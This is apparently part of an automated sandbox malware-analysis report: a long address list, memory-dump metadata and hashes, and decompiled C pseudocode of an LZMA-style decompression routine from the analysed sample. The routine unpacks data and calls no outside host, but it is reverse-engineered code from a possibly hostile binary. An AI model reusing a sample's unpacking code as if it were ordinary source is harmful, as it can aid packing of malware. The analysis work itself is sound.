                                                                                            0x00406636
                                                                                            0x00406636
                                                                                            0x00000000
                                                                                            0x00406636
                                                                                            0x004064b4
                                                                                            0x004064b6
                                                                                            0x004064b8
                                                                                            0x004064ba
                                                                                            0x004064bd
                                                                                            0x004064be
                                                                                            0x004064c0
                                                                                            0x004064c2
                                                                                            0x004064c5
                                                                                            0x004064c8
                                                                                            0x004064de
                                                                                            0x004064e3
                                                                                            0x0040651b
                                                                                            0x0040651b
                                                                                            0x0040651f
                                                                                            0x0040654b
                                                                                            0x0040654d
                                                                                            0x00406554
                                                                                            0x00406557
                                                                                            0x0040655a
                                                                                            0x0040655a
                                                                                            0x0040655f
                                                                                            0x0040655f
                                                                                            0x00406561
                                                                                            0x00406564
                                                                                            0x0040656b
                                                                                            0x0040656e
                                                                                            0x0040659b
                                                                                            0x0040659b
                                                                                            0x0040659e
                                                                                            0x004065a1
                                                                                            0x00406615
                                                                                            0x00406615
                                                                                            0x00406615
                                                                                            0x00000000
                                                                                            0x00406615
                                                                                            0x004065a3
                                                                                            0x004065a9
                                                                                            0x004065ac
                                                                                            0x004065af
                                                                                            0x004065b2
                                                                                            0x004065b5
                                                                                            0x004065b8
                                                                                            0x004065bb
                                                                                            0x004065be
                                                                                            0x004065c1
                                                                                            0x004065c4
                                                                                            0x004065dd
                                                                                            0x004065df
                                                                                            0x004065e2
                                                                                            0x004065e3
                                                                                            0x004065e6
                                                                                            0x004065e8
                                                                                            0x004065eb
                                                                                            0x004065ed
                                                                                            0x004065ef
                                                                                            0x004065f2
                                                                                            0x004065f4
                                                                                            0x004065f7
                                                                                            0x004065fb
                                                                                            0x004065fd
                                                                                            0x004065fd
                                                                                            0x004065fe
                                                                                            0x00406601
                                                                                            0x00406604
                                                                                            0x004065c6
                                                                                            0x004065c6
                                                                                            0x004065ce
                                                                                            0x004065d3
                                                                                            0x004065d5
                                                                                            0x004065d8
                                                                                            0x004065d8
                                                                                            0x00406607
                                                                                            0x0040660e
                                                                                            0x00406598
                                                                                            0x00406598
                                                                                            0x00406598
                                                                                            0x00406598
                                                                                            0x00000000
                                                                                            0x00406610
                                                                                            0x00000000
                                                                                            0x00406610
                                                                                            0x0040660e
                                                                                            0x00406521
                                                                                            0x00406524
                                                                                            0x00406526
                                                                                            0x00406529
                                                                                            0x0040652c
                                                                                            0x0040652f
                                                                                            0x00406531
                                                                                            0x00406534
                                                                                            0x00406537
                                                                                            0x00406537
                                                                                            0x0040653a
                                                                                            0x0040653a
                                                                                            0x0040653d
                                                                                            0x00406544
                                                                                            0x00406518
                                                                                            0x00406518
                                                                                            0x00406518
                                                                                            0x00406518
                                                                                            0x00000000
                                                                                            0x00406546
                                                                                            0x00000000
                                                                                            0x00406546
                                                                                            0x00406544
                                                                                            0x004064ca
                                                                                            0x004064cd
                                                                                            0x004064cf
                                                                                            0x004064d2
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406231
                                                                                            0x00406231
                                                                                            0x00406235
                                                                                            0x0040687a
                                                                                            0x00000000
                                                                                            0x0040687a
                                                                                            0x0040623b
                                                                                            0x0040623e
                                                                                            0x00406241
                                                                                            0x00406244
                                                                                            0x00406247
                                                                                            0x0040624a
                                                                                            0x0040624d
                                                                                            0x0040624f
                                                                                            0x00406252
                                                                                            0x00406255
                                                                                            0x00406258
                                                                                            0x0040625a
                                                                                            0x0040625a
                                                                                            0x0040625a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004063bc
                                                                                            0x004063bc
                                                                                            0x004063c0
                                                                                            0x00406886
                                                                                            0x00000000
                                                                                            0x00406886
                                                                                            0x004063c6
                                                                                            0x004063c9
                                                                                            0x004063cc
                                                                                            0x004063cf
                                                                                            0x004063d1
                                                                                            0x004063d1
                                                                                            0x004063d1
                                                                                            0x004063d4
                                                                                            0x004063d7
                                                                                            0x004063da
                                                                                            0x004063dd
                                                                                            0x004063e0
                                                                                            0x004063e3
                                                                                            0x004063e4
                                                                                            0x004063e6
                                                                                            0x004063e6
                                                                                            0x004063e6
                                                                                            0x004063e9
                                                                                            0x004063ec
                                                                                            0x004063ef
                                                                                            0x004063f2
                                                                                            0x004063f2
                                                                                            0x004063f2
                                                                                            0x004063f5
                                                                                            0x004063f7
                                                                                            0x004063f7
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406639
                                                                                            0x00406639
                                                                                            0x00406639
                                                                                            0x0040663d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406643
                                                                                            0x00406646
                                                                                            0x00406649
                                                                                            0x0040664c
                                                                                            0x0040664e
                                                                                            0x0040664e
                                                                                            0x0040664e
                                                                                            0x00406651
                                                                                            0x00406654
                                                                                            0x00406657
                                                                                            0x0040665a
                                                                                            0x0040665d
                                                                                            0x00406660
                                                                                            0x00406661
                                                                                            0x00406663
                                                                                            0x00406663
                                                                                            0x00406663
                                                                                            0x00406666
                                                                                            0x00406669
                                                                                            0x0040666c
                                                                                            0x0040666f
                                                                                            0x00406672
                                                                                            0x00406676
                                                                                            0x00406678
                                                                                            0x0040667b
                                                                                            0x00000000
                                                                                            0x0040667d
                                                                                            0x004063fa
                                                                                            0x004063fa
                                                                                            0x00000000
                                                                                            0x004063fa
                                                                                            0x0040667b
                                                                                            0x004068b0
                                                                                            0x004068d2
                                                                                            0x004068d8
                                                                                            0x004068da
                                                                                            0x004068e1
                                                                                            0x004068e3
                                                                                            0x004068ea
                                                                                            0x004068ee
                                                                                            0x00000000
                                                                                            0x00405edf
                                                                                            0x004068e7
                                                                                            0x004068e7
                                                                                            0x00000000
                                                                                            0x004068e7
                                                                                            0x00406734
                                                                                            0x004067ba
                                                                                            0x004067c0
                                                                                            0x004067c3
                                                                                            0x004067c6
                                                                                            0x004067c9
                                                                                            0x004067cc
                                                                                            0x004067cf
                                                                                            0x004067d2
                                                                                            0x004067d5
                                                                                            0x004067db
                                                                                            0x004067f4
                                                                                            0x004067f7
                                                                                            0x004067fa
                                                                                            0x004067fd
                                                                                            0x00406801
                                                                                            0x00406803
                                                                                            0x00406804
                                                                                            0x00406807
                                                                                            0x004067dd
                                                                                            0x004067dd
                                                                                            0x004067e5
                                                                                            0x004067ea
                                                                                            0x004067ec
                                                                                            0x004067ef
                                                                                            0x004067ef
                                                                                            0x00406811
                                                                                            0x00000000
                                                                                            0x00406813
                                                                                            0x00000000
                                                                                            0x00406813
                                                                                            0x00406811
                                                                                            0x00000000
                                                                                            0x00406686

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
                                                                                            • Instruction ID: bb8ed6064adbc6ac752208bd1780db284a58169b415d1e5229999a4f541ad509
                                                                                            • Opcode Fuzzy Hash: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
                                                                                            • Instruction Fuzzy Hash: 11912271D00229CBDF28CF98C854BADBBB1FB44305F15816AD816BB291C7789A96DF44
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 98%
                                                                                            			E00406398() {
                                                                                            				unsigned short _t532;
                                                                                            				signed int _t533;
                                                                                            				void _t534;
                                                                                            				void* _t535;
                                                                                            				signed int _t536;
                                                                                            				signed int _t565;
                                                                                            				signed int _t568;
                                                                                            				signed int _t589;
                                                                                            				signed int* _t606;
                                                                                            				void* _t613;
                                                                                            
                                                                                            				L0:
                                                                                            				while(1) {
                                                                                            					L0:
                                                                                            					if( *(_t613 - 0x40) != 0) {
                                                                                            						L89:
                                                                                            						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                                                                                            						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                                                                                            						L69:
                                                                                            						_t606 =  *(_t613 - 0x58);
                                                                                            						 *(_t613 - 0x84) = 0x12;
                                                                                            						L132:
                                                                                            						 *(_t613 - 0x54) = _t606;
                                                                                            						L133:
                                                                                            						_t532 =  *_t606;
                                                                                            						_t589 = _t532 & 0x0000ffff;
                                                                                            						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                            						if( *(_t613 - 0xc) >= _t565) {
                                                                                            							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                            							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                            							 *(_t613 - 0x40) = 1;
                                                                                            							_t533 = _t532 - (_t532 >> 5);
                                                                                            							 *_t606 = _t533;
                                                                                            						} else {
                                                                                            							 *(_t613 - 0x10) = _t565;
                                                                                            							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                            							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                                                                                            						}
                                                                                            						if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                            							L139:
                                                                                            							_t534 =  *(_t613 - 0x84);
                                                                                            							L140:
                                                                                            							 *(_t613 - 0x88) = _t534;
                                                                                            							goto L1;
                                                                                            						} else {
                                                                                            							L137:
                                                                                            							if( *(_t613 - 0x6c) == 0) {
                                                                                            								 *(_t613 - 0x88) = 5;
                                                                                            								goto L170;
                                                                                            							}
                                                                                            							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                                            							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                            							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                            							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                            							goto L139;
                                                                                            						}
                                                                                            					} else {
                                                                                            						if( *(__ebp - 0x60) == 0) {
                                                                                            							L171:
                                                                                            							_t536 = _t535 | 0xffffffff;
                                                                                            							L172:
                                                                                            							return _t536;
                                                                                            						}
                                                                                            						__eax = 0;
                                                                                            						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                            						0 | _t258 = _t258 + _t258 + 9;
                                                                                            						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                            						L75:
                                                                                            						if( *(__ebp - 0x64) == 0) {
                                                                                            							 *(__ebp - 0x88) = 0x1b;
                                                                                            							L170:
                                                                                            							_t568 = 0x22;
                                                                                            							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                                            							_t536 = 0;
                                                                                            							goto L172;
                                                                                            						}
                                                                                            						__eax =  *(__ebp - 0x14);
                                                                                            						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                            						if(__eax >=  *(__ebp - 0x74)) {
                                                                                            							__eax = __eax +  *(__ebp - 0x74);
                                                                                            						}
                                                                                            						__edx =  *(__ebp - 8);
                                                                                            						__cl =  *(__eax + __edx);
                                                                                            						__eax =  *(__ebp - 0x14);
                                                                                            						 *(__ebp - 0x5c) = __cl;
                                                                                            						 *(__eax + __edx) = __cl;
                                                                                            						__eax = __eax + 1;
                                                                                            						__edx = 0;
                                                                                            						_t274 = __eax %  *(__ebp - 0x74);
                                                                                            						__eax = __eax /  *(__ebp - 0x74);
                                                                                            						__edx = _t274;
                                                                                            						__eax =  *(__ebp - 0x68);
                                                                                            						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                            						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                            						_t283 = __ebp - 0x64;
                                                                                            						 *_t283 =  *(__ebp - 0x64) - 1;
                                                                                            						 *( *(__ebp - 0x68)) = __cl;
                                                                                            						L79:
                                                                                            						 *(__ebp - 0x14) = __edx;
                                                                                            						L80:
                                                                                            						 *(__ebp - 0x88) = 2;
                                                                                            					}
                                                                                            					L1:
                                                                                            					_t535 =  *(_t613 - 0x88);
                                                                                            					if(_t535 > 0x1c) {
                                                                                            						goto L171;
                                                                                            					}
                                                                                            					switch( *((intOrPtr*)(_t535 * 4 +  &M004068EF))) {
                                                                                            						case 0:
                                                                                            							if( *(_t613 - 0x6c) == 0) {
                                                                                            								goto L170;
                                                                                            							}
                                                                                            							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                            							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                            							_t535 =  *( *(_t613 - 0x70));
                                                                                            							if(_t535 > 0xe1) {
                                                                                            								goto L171;
                                                                                            							}
                                                                                            							_t539 = _t535 & 0x000000ff;
                                                                                            							_push(0x2d);
                                                                                            							asm("cdq");
                                                                                            							_pop(_t570);
                                                                                            							_push(9);
                                                                                            							_pop(_t571);
                                                                                            							_t609 = _t539 / _t570;
                                                                                            							_t541 = _t539 % _t570 & 0x000000ff;
                                                                                            							asm("cdq");
                                                                                            							_t604 = _t541 % _t571 & 0x000000ff;
                                                                                            							 *(_t613 - 0x3c) = _t604;
                                                                                            							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                                            							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                                                                                            							_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                                            							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                                            								L10:
                                                                                            								if(_t612 == 0) {
                                                                                            									L12:
                                                                                            									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                                            									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                            									goto L15;
                                                                                            								} else {
                                                                                            									goto L11;
                                                                                            								}
                                                                                            								do {
                                                                                            									L11:
                                                                                            									_t612 = _t612 - 1;
                                                                                            									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                                            								} while (_t612 != 0);
                                                                                            								goto L12;
                                                                                            							}
                                                                                            							if( *(_t613 - 4) != 0) {
                                                                                            								GlobalFree( *(_t613 - 4));
                                                                                            							}
                                                                                            							_t535 = GlobalAlloc(0x40, 0x600); // executed
                                                                                            							 *(_t613 - 4) = _t535;
                                                                                            							if(_t535 == 0) {
                                                                                            								goto L171;
                                                                                            							} else {
                                                                                            								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                                            								goto L10;
                                                                                            							}
                                                                                            						case 1:
                                                                                            							L13:
                                                                                            							__eflags =  *(_t613 - 0x6c);
                                                                                            							if( *(_t613 - 0x6c) == 0) {
                                                                                            								 *(_t613 - 0x88) = 1;
                                                                                            								goto L170;
                                                                                            							}
                                                                                            							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                            							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                                            							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                            							_t45 = _t613 - 0x48;
                                                                                            							 *_t45 =  *(_t613 - 0x48) + 1;
                                                                                            							__eflags =  *_t45;
                                                                                            							L15:
                                                                                            							if( *(_t613 - 0x48) < 4) {
                                                                                            								goto L13;
                                                                                            							}
                                                                                            							_t547 =  *(_t613 - 0x40);
                                                                                            							if(_t547 ==  *(_t613 - 0x74)) {
                                                                                            								L20:
                                                                                            								 *(_t613 - 0x48) = 5;
                                                                                            								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                                            								goto L23;
                                                                                            							}
                                                                                            							 *(_t613 - 0x74) = _t547;
                                                                                            							if( *(_t613 - 8) != 0) {
                                                                                            								GlobalFree( *(_t613 - 8));
                                                                                            							}
                                                                                            							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                                            							 *(_t613 - 8) = _t535;
                                                                                            							if(_t535 == 0) {
                                                                                            								goto L171;
                                                                                            							} else {
                                                                                            								goto L20;
                                                                                            							}
                                                                                            						case 2:
                                                                                            							L24:
                                                                                            							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                                            							 *(_t613 - 0x84) = 6;
                                                                                            							 *(_t613 - 0x4c) = _t554;
                                                                                            							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
                                                                                            							goto L132;
                                                                                            						case 3:
                                                                                            							L21:
                                                                                            							__eflags =  *(_t613 - 0x6c);
                                                                                            							if( *(_t613 - 0x6c) == 0) {
                                                                                            								 *(_t613 - 0x88) = 3;
                                                                                            								goto L170;
                                                                                            							}
                                                                                            							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                            							_t67 = _t613 - 0x70;
                                                                                            							 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                                            							__eflags =  *_t67;
                                                                                            							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                            							L23:
                                                                                            							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                                            							if( *(_t613 - 0x48) != 0) {
                                                                                            								goto L21;
                                                                                            							}
                                                                                            							goto L24;
                                                                                            						case 4:
                                                                                            							goto L133;
                                                                                            						case 5:
                                                                                            							goto L137;
                                                                                            						case 6:
                                                                                            							__edx = 0;
                                                                                            							__eflags =  *(__ebp - 0x40);
                                                                                            							if( *(__ebp - 0x40) != 0) {
                                                                                            								__eax =  *(__ebp - 4);
                                                                                            								__ecx =  *(__ebp - 0x38);
                                                                                            								 *(__ebp - 0x34) = 1;
                                                                                            								 *(__ebp - 0x84) = 7;
                                                                                            								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                            								goto L132;
                                                                                            							}
                                                                                            							__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                            							__esi =  *(__ebp - 0x60);
                                                                                            							__cl = 8;
                                                                                            							__cl = 8 -  *(__ebp - 0x3c);
                                                                                            							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                            							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                            							__ecx =  *(__ebp - 0x3c);
                                                                                            							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                            							__ecx =  *(__ebp - 4);
                                                                                            							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                            							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                            							__eflags =  *(__ebp - 0x38) - 4;
                                                                                            							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                            							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                            							if( *(__ebp - 0x38) >= 4) {
                                                                                            								__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                            								if( *(__ebp - 0x38) >= 0xa) {
                                                                                            									_t98 = __ebp - 0x38;
                                                                                            									 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                            									__eflags =  *_t98;
                                                                                            								} else {
                                                                                            									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                            								}
                                                                                            							} else {
                                                                                            								 *(__ebp - 0x38) = 0;
                                                                                            							}
                                                                                            							__eflags =  *(__ebp - 0x34) - __edx;
                                                                                            							if( *(__ebp - 0x34) == __edx) {
                                                                                            								__ebx = 0;
                                                                                            								__ebx = 1;
                                                                                            								goto L61;
                                                                                            							} else {
                                                                                            								__eax =  *(__ebp - 0x14);
                                                                                            								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                            								__eflags = __eax -  *(__ebp - 0x74);
                                                                                            								if(__eax >=  *(__ebp - 0x74)) {
                                                                                            									__eax = __eax +  *(__ebp - 0x74);
                                                                                            									__eflags = __eax;
                                                                                            								}
                                                                                            								__ecx =  *(__ebp - 8);
                                                                                            								__ebx = 0;
                                                                                            								__ebx = 1;
                                                                                            								__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                            								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                            								goto L41;
                                                                                            							}
                                                                                            						case 7:
                                                                                            							__eflags =  *(__ebp - 0x40) - 1;
                                                                                            							if( *(__ebp - 0x40) != 1) {
                                                                                            								__eax =  *(__ebp - 0x24);
                                                                                            								 *(__ebp - 0x80) = 0x16;
                                                                                            								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                            								__eax =  *(__ebp - 0x28);
                                                                                            								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                            								__eax =  *(__ebp - 0x2c);
                                                                                            								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                            								__eax = 0;
                                                                                            								__eflags =  *(__ebp - 0x38) - 7;
                                                                                            								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                            								__al = __al & 0x000000fd;
                                                                                            								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                            								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                            								__eax =  *(__ebp - 4);
                                                                                            								__eax =  *(__ebp - 4) + 0x664;
                                                                                            								__eflags = __eax;
                                                                                            								 *(__ebp - 0x58) = __eax;
                                                                                            								goto L69;
                                                                                            							}
                                                                                            							__eax =  *(__ebp - 4);
                                                                                            							__ecx =  *(__ebp - 0x38);
                                                                                            							 *(__ebp - 0x84) = 8;
                                                                                            							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                            							goto L132;
                                                                                            						case 8:
                                                                                            							__eflags =  *(__ebp - 0x40);
                                                                                            							if( *(__ebp - 0x40) != 0) {
                                                                                            								__eax =  *(__ebp - 4);
                                                                                            								__ecx =  *(__ebp - 0x38);
                                                                                            								 *(__ebp - 0x84) = 0xa;
                                                                                            								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                            							} else {
                                                                                            								__eax =  *(__ebp - 0x38);
                                                                                            								__ecx =  *(__ebp - 4);
                                                                                            								__eax =  *(__ebp - 0x38) + 0xf;
                                                                                            								 *(__ebp - 0x84) = 9;
                                                                                            								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                            								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                            							}
                                                                                            							goto L132;
                                                                                            						case 9:
                                                                                            							goto L0;
                                                                                            						case 0xa:
                                                                                            							__eflags =  *(__ebp - 0x40);
                                                                                            							if( *(__ebp - 0x40) != 0) {
                                                                                            								__eax =  *(__ebp - 4);
                                                                                            								__ecx =  *(__ebp - 0x38);
                                                                                            								 *(__ebp - 0x84) = 0xb;
                                                                                            								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                            								goto L132;
                                                                                            							}
                                                                                            							__eax =  *(__ebp - 0x28);
                                                                                            							goto L88;
                                                                                            						case 0xb:
                                                                                            							__eflags =  *(__ebp - 0x40);
                                                                                            							if( *(__ebp - 0x40) != 0) {
                                                                                            								__ecx =  *(__ebp - 0x24);
                                                                                            								__eax =  *(__ebp - 0x20);
                                                                                            								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                            							} else {
                                                                                            								__eax =  *(__ebp - 0x24);
                                                                                            							}
                                                                                            							__ecx =  *(__ebp - 0x28);
                                                                                            							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                            							L88:
                                                                                            							__ecx =  *(__ebp - 0x2c);
                                                                                            							 *(__ebp - 0x2c) = __eax;
                                                                                            							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                            							goto L89;
                                                                                            						case 0xc:
                                                                                            							L99:
                                                                                            							__eflags =  *(__ebp - 0x6c);
                                                                                            							if( *(__ebp - 0x6c) == 0) {
                                                                                            								 *(__ebp - 0x88) = 0xc;
                                                                                            								goto L170;
                                                                                            							}
                                                                                            							__ecx =  *(__ebp - 0x70);
                                                                                            							__eax =  *(__ebp - 0xc);
                                                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            							_t334 = __ebp - 0x70;
                                                                                            							 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                            							__eflags =  *_t334;
                                                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            							__eax =  *(__ebp - 0x2c);
                                                                                            							goto L101;
                                                                                            						case 0xd:
                                                                                            							L37:
                                                                                            							__eflags =  *(__ebp - 0x6c);
                                                                                            							if( *(__ebp - 0x6c) == 0) {
                                                                                            								 *(__ebp - 0x88) = 0xd;
                                                                                            								goto L170;
                                                                                            							}
                                                                                            							__ecx =  *(__ebp - 0x70);
                                                                                            							__eax =  *(__ebp - 0xc);
                                                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            							_t122 = __ebp - 0x70;
                                                                                            							 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                            							__eflags =  *_t122;
                                                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            							L39:
                                                                                            							__eax =  *(__ebp - 0x40);
                                                                                            							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                            							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                            								goto L48;
                                                                                            							}
                                                                                            							__eflags = __ebx - 0x100;
                                                                                            							if(__ebx >= 0x100) {
                                                                                            								goto L54;
                                                                                            							}
                                                                                            							L41:
                                                                                            							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                            							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                            							__ecx =  *(__ebp - 0x58);
                                                                                            							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                            							 *(__ebp - 0x48) = __eax;
                                                                                            							__eax = __eax + 1;
                                                                                            							__eax = __eax << 8;
                                                                                            							__eax = __eax + __ebx;
                                                                                            							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                            							__ax =  *__esi;
                                                                                            							 *(__ebp - 0x54) = __esi;
                                                                                            							__edx = __ax & 0x0000ffff;
                                                                                            							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                            							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                            							if( *(__ebp - 0xc) >= __ecx) {
                                                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                            								__cx = __ax;
                                                                                            								 *(__ebp - 0x40) = 1;
                                                                                            								__cx = __ax >> 5;
                                                                                            								__eflags = __eax;
                                                                                            								__ebx = __ebx + __ebx + 1;
                                                                                            								 *__esi = __ax;
                                                                                            							} else {
                                                                                            								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                            								 *(__ebp - 0x10) = __ecx;
                                                                                            								0x800 = 0x800 - __edx;
                                                                                            								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                            								__ebx = __ebx + __ebx;
                                                                                            								 *__esi = __cx;
                                                                                            							}
